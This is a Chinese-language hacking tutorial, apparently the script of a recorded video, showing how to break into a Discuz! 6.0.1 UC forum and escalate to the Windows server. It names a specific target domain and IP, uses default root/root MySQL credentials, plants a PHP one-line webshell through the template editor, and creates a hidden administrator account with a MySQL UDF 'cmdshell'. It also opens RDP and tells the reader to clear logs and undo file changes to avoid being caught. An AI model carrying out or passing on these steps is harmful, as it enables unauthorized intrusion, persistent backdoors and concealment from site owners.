动画名称：入侵DZ6.0UC版到MYSQL提权

动画制作：孤_狼

入侵步骤：1.搜索DZ程序的网站：Powered by Discuz! 6.0.1 UC

          2.检测是否存在漏洞：/uc_install/ 说明漏洞存在 这个站还没安装UC
          
            (我不详细找了，目标站：http://www.firezhu.com/discuz/ 服务器IP：124.128.200.254)

          3.如果漏洞存在，并且能连接MYSQL，那么就成功了一半

http://124.128.200.254/phpmyadmin/ 安装了phpmyadmin 我们来连接 root权限能够管理所有数据库，是MYSQL的最高权限

            数据库服务器:  localhost:6033
数据库名  discuz
数据库用户名:  root
数据库密码: root

接下来我们注册一个新用户，下面通过MYSQL给新用户提升为管理员，好了，现在刷新下看看，已经是管理员了，登陆后台拿WEBSHELL
DZ后台拿WEBSHELL一般是在线模板编辑，插入一句画木马，或者直接编辑成小马，我编辑大马 eval($_POST[c]);这个是插的一句话大马的地址：http://www.firezhu.com/discuz/templates/default/customfaq.lang.php

因为是ROOT权限可以提权，大家看操作，提权的相关文件我会一起打包的，在这里输入我们得到的帐号和密码，因为现在的服务器大部分是
WIN2003 所以提权导出的路径为windows，出现错误的原因是我刚才已经导出过了，

先找ROOT账户

C:\Winnt\udf.dll    2000
C:\Windows\udf.dll  2003

现在基本上win的服务器就这两个导出UDF.DLL

create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user feixiang$ chen9696* /add');
select cmdshell('net localgroup administrators feixiang$ /add');

下面看看我们的帐号建立了没有，再看看3389是否开放，3389开了，我们登陆下，登陆成功！
select cmdshell('c:\3389.exe');
drop function cmdshell;  删除函数
select cmdshell('netstat -an');

提升权限以后要记得清楚日志，这里我就不演示了，我刚才改了这个文件customfaq.lang.php，现在要改回来哦，不然被发现！·

有了权限就把这个ID删除吧，基本上就是这些！

注意问题：入侵成功与否的关键是能不能连接MYSQL数据库，一般服务器都装了PHPMYADMIN，有的没有装，如果
        
          MYSQL可以远程调用的话，那么自己在本地搭建一个PHP环境安装PHPMYADMIN，通过修改config.inc.php

          ，在本机连接远程mysql。